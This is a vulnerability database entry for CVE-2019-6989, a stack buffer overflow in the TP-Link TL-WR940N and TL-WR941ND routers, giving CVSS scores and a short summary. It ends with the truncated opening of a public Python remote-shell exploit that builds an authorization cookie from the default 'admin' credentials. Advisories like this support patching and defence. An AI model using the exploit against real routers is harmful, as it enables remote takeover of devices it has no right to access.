8.8
CVSSv3

CVE-2019-6989

Published: 06/06/2019 Updated: 24/08/2020
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 905
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

TP-Link TL-WR940N is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the ipAddrDispose function. By sending specially crafted ICMP echo request packets, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

tp-link tl-wr940n_firmware -

tp-link tl-wr941nd_firmware -

Exploits

#Author Grzegorz Wypych - h0rac # TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit import requests import md5 import base64 import string import struct import socket password = md5new('admin')hexdigest() cookie = base64b64encode('admin:'+password) print '[+] Authorization cookie: ', cookie print '[+] Login to generate user di ...